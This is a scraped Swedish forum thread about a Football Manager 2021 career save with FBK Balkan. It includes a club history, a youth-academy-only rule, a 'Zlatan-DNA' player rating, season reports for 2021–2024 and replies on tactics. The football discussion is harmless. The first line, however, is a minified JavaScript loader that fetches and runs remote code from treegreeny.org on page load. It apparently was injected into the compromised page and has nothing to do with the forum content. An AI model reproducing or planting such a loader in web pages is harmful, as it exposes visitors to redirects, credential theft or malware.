;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM21] FBK Balkan – Jakten på nästa Zlatan (Youth only) – Rapporter – FMSweden Forum
Meny Stäng

[FM21] FBK Balkan -...
 
Share:
Notifications
Clear all

[FM21] FBK Balkan - Jakten på nästa Zlatan (Youth only)

100 Inlägg
15 Users
280 Likes
7,251 Visningar
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  

INTRODUKTION
Då min förra save i Afrika fick ett abrupt avslut redan efter tre säsonger på grund av en jobbig bugg, började jag spana efter ett nytt projekt. Jag var mest sugen på en save i Sverige och när jag noterade klubben FBK Balkan i division 2 ringde några klockor. Jovisst, det är ju en viss Zlatans moderklubb, där allting började. FBK Balkan vann division 3 södra Götaland 2020 och klubben blev därmed klar för spel i division 2 för första gången sedan 1991. Klubben är ju mest känd för att vara Zlatans moderklubb, och därför kommer denna save gå ut på att försöka producera "nästa Zlatan" genom klubbens akademi. 

HISTORIA
FBK Balkan grundades 22 november 1962 av dåvarande jugoslaviska arbetskraftsinvandrare som kommit till Malmö. I början föreslogs att klubben skulle döpas till Yugoslavia, men en del gillade inte det namnet. Dock kunde alla enas kring namnet Balkan. I början fick klubben hjälp av den jugoslaviska staten, inte med pengar utan med utrustning och träningsläger. Premiäråret krossade laget allt motstånd och vann division 7 med 138-19 i målskillnad. Året därpå tog Balkan hem sexan. Klubbens fotbollsfilosofi var kortpassningar och spel längs marken. Det uppskattades. Men många motståndare uppskattade däremot inte att spelarna inte pratade svenska. 1963 öppnade klubben för spelare som inte hade rötter i dåvarande Jugoslavien.

REGLER
I samma anda som i min första balkan-relaterade save i Belgrad på FM20, kommer jag bara få använda mig av spelare som kommer via klubbens egna ungdomsintag. Detta är ett spelsätt som jag föredrar eftersom det är en stor utmaning och gör ungdomsintagen väldigt värdefulla. Jag kommer dock att tillåta mig värva tillbaka hemmafostrade spelare som lämnar klubben. 

MÅLSÄTTNING
Som sagt är den främsta målsättningen med saven att producera "nästa Zlatan". Och med det menar jag helt enkelt Sveriges bästa fotbollsspelare, kanske inte någonsin, men under en viss tidsperiod. Jag tror att det blir tufft att få fram en spelare som kammar hem 12 guldbollar, en spelare på Zlatans nivå känns faktiskt ganska orealistiskt. Men man vet aldrig. Målet blir därför att producera en spelare som vinner minst tre guldbollar under sin karriär, vilket känns lite mer realistiskt. 

På klubbsidan har vi egentligen ingen målsättning men om vi ska kunna producera "nästa Zlatan" måste vi ju etablera oss som en av Sveriges bästa klubbar och utveckla en toppklassig akademi.

ZLATAN-DNA
Jag kan inte låta bli att inspireras av en viss Barcelona-save av The Gustine här på forumet. På samma sätt som honom kommer vi att använda oss av ett DNA-system. Detta för att kunna bedöma vilka spelare som mest liknar Zlatan, och även för att skapa en klubbfilosofi vad gäller viktiga attribut för spelare att ha. Dessa sju attributer är: beslutsamhet, finess, ledarskap, grundkondition, balans, bollmottagning och teknik. Dessa är enligt spelet Zlatans bästa egenskaper, alla har han över 19 och räknar man ut Zlatans egna Zlatan-DNA hamnar han på medelvärdet 19,71 av 20. Inte illa.

TRÄNAREN - GORAN RADIC
I vanlig ordning har jag en regen från en tidigare save som tränare. Passande nog är det den här gången serben Goran Radic, den legendariske målskytten från min save med BASK Belgrad. 

Vad gäller upplägget kommer det till stor del att vara en uppdatering efter varje säsong. Jag kommer inte gå in i så mycket detalj i spelarna i början eftersom de helt enkelt kommer vara dåliga. Detta projekt kommer ta många säsonger, det kanske till och med kommer misslyckas helt, men det är inte helt omöjligt. Vamos!


   
rockystar, raca14, Kristijan and 1 people reacted
Citera
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  

Denna sida uppdateras efter varje säsong


Rekord

Spelare
Flest matcher: 595 - Martin Enström (8a)
Flest mål: 371 - Martin Enström (8a)
Flest assist: 120 - Melvin Larsson (9c)
Yngsta spelaren: 15 år 288 dagar - Pontus Svensson (9a)
Äldsta spelaren: 37 år 295 dagar - William Ngounou

Klubb
Största försäljningen: €3 700 000 (Samuel Holmqvist (32a) till Juventus, 2055)
Högsta publiksiffran: 2 500 (vs Helsingborgs IF, 2053)
Flest matcher vunna i rad: 8
Flest matcher utan förlust i rad: 20


Utveckling


Faciliteter


Spelare


Nationer representerade via ungdomsintag
mini flag icon of Swedenmini flag icon of Sierra Leonemini flag icon of Australiamini flag icon of Cyprusmini flag icon of Bosnia & Herzegovinamini flag icon of Russian Federationmini flag icon of Jamaicamini flag icon of Italyflag icon of Ethiopia, 24x24mini flag icon of Cape Verdeflag icon of Uganda, 24x24mini flag icon of Iraqmini flag icon of Albaniamini flag icon of Serbiamini flag icon of Congo-Kinshasamini flag icon of Israelmini flag icon of Somaliaflag icon of Poland, 24x24flag icon of Japan, 24x24flag icon of Croatia, 24x24flag icon of Ireland, 24x24mini flag icon of Denmarkflag icon of Macedonia, 24x24mini flag icon of Kosovomini flag icon of Greeceflag icon of Cote d'Ivoire, 24x24flag icon of Palestine, 24x24flag icon of Netherlands, 24x24flag icon of Bolivia, 24x24flag icon of Turkey, 24x24mini flag icon of Uruguayflag icon of Mali, 24x24flag icon of Guinea, 24x24flag icon of Eritrea, 24x24flag icon of Mexico, 24x24flag icon of England, 24x24flag icon of Afghanistan, 24x24flag icon of Algeria, 24x24flag icon of Gambia, 24x24mini flag icon of Estoniaflag icon of Argentina, 24x24mini flag icon of Montenegromini flag icon of Nigeriamini flag icon of Gabonmini flag icon of Viet Nammini flag icon of Icelandflag icon of Spain, 24x24mini flag icon of Lebanonflag icon of Canada, 24x24flag icon of Finland, 24x24flag icon of Syria, 24x24   
Q, Billinator and Micke reacted
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 3 år sedan
Inlägg: 239
 

Rolig idé, blir att följa denna!

"I have never played for a draw in my life." - Sir Alex Ferguson


   
LeoFM reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 3 år sedan
Inlägg: 155
 

Blir otroligt kul och följa det här!!


   
LeoFM reacted
SvaraCitera
friggan
(@friggan)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 180
 

Lycka till!


   
LeoFM reacted
SvaraCitera
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  

Säsong 1 - 2021

De första säsongerna kommer mest handla om att inte åka ur division 2. Inför säsongen tippades vi hamna tolva i tabellen, vilket skulle resultera i en negativ kvalplats. Vad gäller spelartruppen har vi en spelare som sticker ut - anfallaren Andrej Simeunovic, som tog en plats i medians drömelva inför säsongen. Om vi ska kunna hävda oss i division 2 måste han prestera.


Taktiken
Det var säkert många som tvivlade på Gorans 3-4-1-2 2DM formation när han ställde upp den på taktiktavlan på första träningen. Goran hade identifierat truppens svaghet i ytterbackspositionerna och eftersom vi inte kan värva spelare får vi nyttja det vi har att tillgå. 

Taktiken är en blandning av FBK Balkans ursprungliga spelstil med korta passningar längs marken och filosofin kring vårt Zlatan-DNA. Vi vill spela med finess och teknik.

Jag har aldrig tillämpat en liknande taktik på division 2-nivå och till en början tvivlade även jag. Men det var en rolig utmaning att få den att fungera och till slut började resultaten komma.


Tabellen

En förkortad corona-säsong avslutades efter endast 14 matcher och det var väldigt frustrerande eftersom vi hade en fin form mot slutet av säsongen. Men en fjärdeplats är en bra placering och dessutom slutade vi med bäst målskillnad i serien.


Resultat


Priser
Årets spelare: Dennis Rickbo
Flest mål: 15 - Dennis Rickbo
Högst snittbetyg: 7.89 - Dennis Rickbo
Flest assist: 6 - Andrej Simeunovic


Bästa elvan
Av någon anledning presenterades aldrig någon bästa elva för säsongen, så jag för utgå från min egen bedömning.

(Namn - Zlatan-DNA)
Johan Jönsson - 5,57
Edis Ademi - 6
Hozan Muhamad - 8,29
Mikias Yonas - 8
Viktor Ivanov - 8,14
Valon Gashi - 6,71
Hamid Abdulla - 9,14
Hogr Aziz - 5,86
Sebastian Rask - 9,43
Dennis Rickbo - 9,14
Andrej Simeunovic - 9


Ungdomsintag

Jag brukar beteckna varje ungdomsspelare med en siffra och en bokstav för att lätt kunna hålla koll på vilken årskull spelaren tillhör samt hur talangfull spelaren är. Siffran anger säsongen då spelaren kom till klubben och bokstaven anger hur pass talangfull spelaren är beroende på potential och förmåga.

Vi har i princip de sämsta möjliga faciliteterna och sämst rykte i hela division 2, detta gjorde det väldigt svårt för mig att vara hoppfull inför detta intag. Det var ungefär så dåligt som jag förväntade mig. En spelare står ut och kommer att flyttas upp till a-laget, nämligen David Kamanor från Sierra Leone av alla länder. Han är inte nästa Zlatan, men han kan utvecklas till en användbar spelare. Melker Karlsson hade högst Zlatan-DNA med sitt 9,14.


Kontrakterade spelare
(Nationalitet - Namn - Zlatan-DNA - Födelsestad)
flag icon of Sierra Leone, 16x16flag icon of Sweden, 16x16 - David Kamanor (1a) - 8,71 - Tongoma
flag icon of Sweden, 16x16 - Emil Lindström (1b) - 6,14 - Rosengård
flag icon of Sweden, 16x16 - Adam Wikman (1c) - 8,43 - Rosengård
flag icon of Australia, 16x16flag icon of Sweden, 16x16 - Ryan Cameron (1d) - 8,71 - Springwood
flag icon of Sweden, 16x16 - Pär Svejme (1e) - 6,29 - Rosengård
flag icon of Sweden, 16x16 - Melker Karlsson (1f) - 9,14 - Rosengård
flag icon of Sweden, 16x16 - Gustav Eriksson (1i) - 7,71 - Rosengård


Utveckling

Faciliteter

Spelare

Rekord (länk)   
The Gustine, raca14, Micke and 1 people reacted
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 3 år sedan
Inlägg: 225
 

Ser att du tagit min uppställning! ? ? 

Första gången jag ser att någon kör med den i en save.


   
LeoFM and Micke reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 3 år sedan
Inlägg: 155
 

Super! Kul för saven och talangerna att ni inte gick upp!


   
LeoFM reacted
SvaraCitera
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  
Postad av: @raca14

Ser att du tagit min uppställning! ? ? 

Första gången jag ser att någon kör med den i en save.

Den är faktiskt överraskande bra och underhållande! Får se hur länge jag kör med den, men jag hoppas att det kan bli vår egna "patenterade" formation.


   
raca14 reacted
SvaraCitera
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  

Säsong 2 - 2022

Målet för säsongen var att inte åka ur, vilket såg ut att bli en större utmaning än befarat inför säsongen då vår bästa spelare Andrej Simeunovic lämnade laget och tyvärr avslutade sin fotbollskarriär helt (lite oväntat då han bara var 23 år).

Kollar man på spelarkvalitet är vi ett av de sämsta division 2-lagen men det verkar vara vår unika taktik som frälser oss. Jag tror att vissa lag helt enkelt inte vet hur man ställer upp mot den.


Tabellen

En fjärdeplats igen och det är vi väldigt nöjda med.


Resultat


Priser
Årets spelare: Sebastian Rask
Flest mål: 17 - Dennis Rickbo
Högst snittbetyg: 7.31 - Sebastian Rask
Flest assist: 13 - Lucas Hallberg Wotango


Bästa elvan

(Namn - Zlatan-DNA)
Johan Jönsson - 5,71
Edis Ademi - 5,71
Hozan Muhamad - 8,14
Mikias Yonas - 7,86
Viktor Ivanov - 7,86
Valon Gashi - 6,43
Hamid Abdulla - 9
Jeton Gashi - 8,29
Sebastian Rask - 9,29
Dennis Rickbo - 9,14
Lucas Hallberg Wotango - 9,71


Ungdomsintag

Sett till potentialen hos kullen ser det lite bättre ut än det förra intaget, men förmågan är sämre. De flesta av de här spelarna är inte ens nära att ta en bänkplats. De har ju dock många år på sig att förbättras, men spelare förbättras inte mycket i ett division 2 lag med urusla faciliteter. Vi kommer behöva uppgradera vår ungdomsrekrytering och ungdomsträning om vi ska kunna producera dugliga spelare. Detta brukar gå ganska snabbt att göra men jag har märkt att det är svårare i FM21 än FM20. Än så länge har vi bara lyckats uppgradera ungdomsrekryteringen en gång.

Spelaren jag tror mest på är faktiskt Christer Strandberg, som inte ser ut att ha stor potential men han kommer nog att vara en användbar defensiv mittfältare eller mittback. Danny Wahlstedt hade högst Zlatan-DNA i kullen (9).


Kontrakterade spelare
(Nationalitet - Namn - Zlatan-DNA - Födelsestad)
flag icon of Sweden, 16x16 - Danny Wahlstedt (2a) - 9 - Rosengård
flag icon of Sweden, 16x16 - Andreas Karlsson (2b) - 8,43 - Rosengård
flag icon of Sweden, 16x16flag icon of Bosnia & Herzegovina, 16x16 - Anel Gudelj (2c) - 8 - Vitez
flag icon of Sweden, 16x16 - Joakim Norén (2d) - 5,14 - Landskrona
flag icon of Sweden, 16x16 - Erik Yilmaz (2e) - 7,29 - Rosengård
flag icon of Sweden, 16x16flag icon of Russian Federation, 16x16 - Alexey Gadjiev (2f) - 6 - Zlatoust
flag icon of Sweden, 16x16 - Ken Örnberg (2g) - 7 - Rosengård
flag icon of Sweden, 16x16flag icon of Jamaica, 16x16 - Lloyd McGraham (2h) - 8,29 - Frankfield
flag icon of Sweden, 16x16 - Christer Strandberg (2i) - 8,86 - Rosengård


Utveckling

Faciliteter

Spelare

Rekord (länk)   
raca14, Micke, Argt Troll and 1 people reacted
SvaraCitera
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  

Säsong 3 - 2023

Ännu en säsong då vi satsar på stabilitet och att inte åka ner till trean. Nästa säsong kommer vi varken spela i division 3 eller division 2, för vi kommer spela i division 1! Vi är definitivt inte redo för det och vi kommer mest högsta sannolikhet studsa ner till tvåan, men den här uppflyttningen gav klubben en välbehövlig ekonomisk boost med ca €40 000, vilket är extremt viktigt för saven.


Tabellen

FBK Balkan går upp! Laget med lägst lönebudget i hela serien står för en helt galen överprestation!


Resultat

Vi vann vår kvalgrupp som innehöll Vårgårda och Ullared. Sedan besegrades Enskede i dubbelmötet och Division 1 2024 var ett faktum. Kul också att två akademiprodukter var avgörande spelare för oss, Kamanor avgjorde med sitt 2-0 mål mot Ullareds IK och Strandberg stod för en delikat assist till kvitteringen mot Enskede. Målen går att se här:
Kamanor vs Ullared | Strandberg assist vs Enskede


Priser
Årets spelare: Dennis Rickbo
Flest mål: 20 - Dennis Rickbo
Högst snittbetyg: 7.16 - Lucas Hallberg Wotango
Flest assist: 10 - Sebastian Rask


Bästa elvan

(Namn - Zlatan-DNA)
Johan Jönsson - 5,57
Edis Ademi - 6
Hozan Muhamad - 7,57
Mikias Yonas - 7,71
Viktor Ivanov - 7,86
Adam Wikman (1c) - 7,86
Hamid Abdulla - 9
David Kamanor (1a) - 8,86
Sebastian Rask - 9,29
Dennis Rickbo - 9
Lucas Hallberg Wotango - 9,71


Ungdomsintag

Det här intaget var tyvärr en besvikelse. Ingen spelare står ut men Tom Kroon har högst Zlatan-DNA av alla ungdomsspelare någonsin - 10,14. Dessutom ser han ut att kunna bli en användbar mittback, så han är nog min favorit från intaget.


Kontrakterade spelare
(Nationalitet - Namn - Zlatan-DNA - Födelsestad)
flag icon of Sweden, 16x16flag icon of Ethiopia, 16x16 - Mesfin Mihret (3a) - 9,57 - Rosengård
flag icon of Sweden, 16x16 - Calle Holgersson (3b) - 6,71 - Rosengård
flag icon of Sweden, 16x16 - Ted Sjöberg (3c) - 6,71 - Rosengård
flag icon of Sweden, 16x16 - Pontus Salomonsson (3e) - 9,86 - Rosengård
flag icon of Sweden, 16x16 - Jonathan Eklöf (3f) - 9,86 - Rosengård
flag icon of Sweden, 16x16 - Sören Carlsson (3h) - 8,14 - Rosengård
flag icon of Sweden, 16x16 - Fabian Johansson (3i) - 8,43 - Rosengård
flag icon of Sweden, 16x16 - Tom Kroon (3k) - 10,14 - Rosengård
flag icon of Sweden, 16x16 - Aron Pettersson (3l) - 8,43 - Rosengård


Utveckling

Faciliteter

Spelare

Rekord (länk)   
raca14 and Kristijan reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 3 år sedan
Inlägg: 155
 

Fan va fint. Bara kör bror!


   
LeoFM reacted
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 3 år sedan
Inlägg: 225
 

@leo

Ser att uppställningen ger resultat! 🙂

Var tycker du svagheterna/styrkorna ligger?


   
LeoFM reacted
SvaraCitera
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  

@raca14

Svagheterna ligger definitivt i backlinjen. Eftersom vi endast har tre riktiga försvarare kan motståndarna ganska lätt överbelasta kanterna och sedan skicka in ett djupt inlägg till bortre stolpen, där det ofta kommer en motståndare i hög fart. Sen blir det inte bättre av att vår backlinje har en snittlängd på 178 cm, och ofta förlorar nickdueller. (Här är ett exempel mot Enskede som visar vad jag menar) Vi försöker tvinga motståndare att spela genom mitten istället för kanterna så mycket som det går för att förhindra detta, och det verkar gå relativt bra. 

Styrkorna ligger främst i offensiven. Det är en balanserad uppställning vilket gör att en spelare nästan aldrig står utan passningsalternativ. Den är även väldigt bra i kontringslägen då vi har två breda yttrar och två anfallare som drar ut motståndarförsvaret och skapar luckor åt vår offensiva mittfältare att röra sig i. 


   
raca14 reacted
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 3 år sedan
Inlägg: 225
 

@leo

Ja, då har vi ungefär liknande uppfattningar vad gäller offensiven.

Själva uppställningen i sig IRL är att få motståndaren att fastna på kanterna då man jobbar på ett sätt som inte många jobbar på defensivt ens IRL. Detta är ytterst svårt om inte omöjligt att efterlikna på FM. Och vill motståndarna spela sig bort från kanten, så är det enda alternativet att spela sig bakåt eller försöka sig på en kross för i mitten ska det vara hyfsat kompakt med tre mittfältare (2 DM och 1 OM) och om det skulle behövas en anfallare som droppar ner lite.

Ska se om jag kan försöka mig på att förklara genom några taktiktavlor senare. 😉


   
LeoFM reacted
SvaraCitera
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  

@raca14

Jag är själv ganska van med uppställningen då mitt ungdomslag ofta spelade med den. Jag brukade spela vänster mittback och defensivt hade vi mer av en fyrbackslinje då en av yttrarna droppade ner. Detta har jag inte kunnat implementera i FM. (Vet att man skulle kunna köra med en defensiv ytter men jag gillar inte instruktionen "slå tidiga inlägg"). 


   
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 3 år sedan
Inlägg: 225
 

@leo

Istället för att yttern skulle droppa ner, så gick den bortre DM in mellan mittbacken och den (bortre)yttre mittbacken som en extra mittback, medan bortre yttern tog jobbet i den yta som DM lämnat efter sig och slapp springa mer än nödvändigt. På så vis blev det en fyrbackslinje när bollen gick ut mot kanterna.

Måste bara fråga var du spelade som ungdom? 🙂

För denna uppställning började mitt lag (förening) med i början av 2000-talet.


   
SvaraCitera
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  

@raca14

Jag spelade i Strands IF P03 och gjorde även några minuter med Hudiksvalls FF u17 men det var i Strands IF som 3-5-2 formationen användes. Jag vill minnas att den kom till under Gothia Cup 2018 inför sista gruppspelsmatchen, vi hade inte gjort mål på två matcher med vår vanliga 4-2-3-1 formation. Då slänger vi fram 3-5-2an för att få fart på offensiven och det gav resultat för vi vann den matchen med 2-1 mot något amerikanskt lag. Sedan körde vi på med den hela turneringen och tog oss nästan till kvartsfinal i B-slutspelet men vi föll snöpligt på straffar i åttondelen. Efter Gothia körde vi på med formationen säsongen ut och den gav ganska bra resultat. 


   
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 3 år sedan
Inlägg: 225
 

@leo

Ok. Då var ni "några" år efter oss då nere i Malmö (FC Malmö)... 🙂


   
LeoFM reacted
SvaraCitera
LeoFM
(@leo)
Estimable Member
Blev medlem: 3 år sedan
Inlägg: 112
Topic starter  

Säsong 4 - 2024

Detta var vår första säsong i division 1, och som väntat skulle det bli svårt att hänga kvar. Men vi kan stolt säga att vi gjorde ett gediget försök. 35 poäng på 30 matcher är flest poäng för ett lag i en direkt nedflyttnings-placering någonsin! Alla andra säsonger än denna skulle vi ha hamnat ovanför det röda strecket med den poängsumman.


Tabellen

Det var verkligen en jämn serie där Norrby får lägsta poängsumman för en seriesegrare i division 1 någonsin.


Resultat


Priser
Årets spelare: Dennis Rickbo
Flest mål: 21 - Dennis Rickbo
Högst snittbetyg: 6.99 - Lucas Hallberg Wotango
Flest assist: 8 - Hamid Abdulla


Bästa elvan

(Namn - Zlatan-DNA)
Johan Jönsson - 5,43
Edis Ademi - 6
Kenan Aliefendić - 6,29
Mikias Yonas - 7,71
Viktor Ivanov - 7,57
Jeton Gashi - 8,29
Hamid Abdulla - 9,43
David Kamanor (1a) - 8,86
Sebastian Rask - 9,29
Dennis Rickbo - 9
Lucas Hallberg Wotango - 9,71


Ungdomsintag

Ungdomsintaget var definitivt säsongens höjdpunkt och här finns det mycket att glädjas åt. Johan Augustsson är den bästa ungdomsspelaren hittills och Calle Lindfors har bäst Zlatan-DNA hittills med sitt 10,43. Många spännande spelare och en del kommer förmodligen få speltid redan nästa säsong. Augustsson kommer ta en startplats som en defensiv mittfältare.


Kontrakterade spelare
(Nationalitet - Namn - Zlatan-DNA - Födelsestad)
flag icon of Sweden, 16x16 - Johan Augustsson (4a) - 7,29 - Lund
flag icon of Sweden, 16x16 - Calle Lindfors (4b) - 10,43 - Rosengård
flag icon of Sweden, 16x16 - Gustav Andersson (4c) - 6 - Rosengård
flag icon of Uganda, 16x16 - David Okot Oola (4d) - 7,86 - Wakiso
flag icon of Sweden, 16x16 - Niklas Rydén (4e) - 7,29 - Rosengård
flag icon of Sweden, 16x16 - Eric Jeppsson (4f) - 8,43 - Rosengård
flag icon of Sweden, 16x16 - Ted Schwarz (4g) - 8,86 - Rosengård
flag icon of Sweden, 16x16 - Tony Linderoth (4h) - 9,14 - Rosengård
flag icon of Sweden, 16x16 - Marcus Lundin (4i) - 7,14 - Rosengård
flag icon of Sweden, 16x16 - Jonas Blomberg (4j) - 8,29 - Rosengård


Utveckling

Faciliteter

Spelare

Rekord (länk)   
Lange95, raca14, Kristijan and 1 people reacted
SvaraCitera
Sida 1 / 5
Share: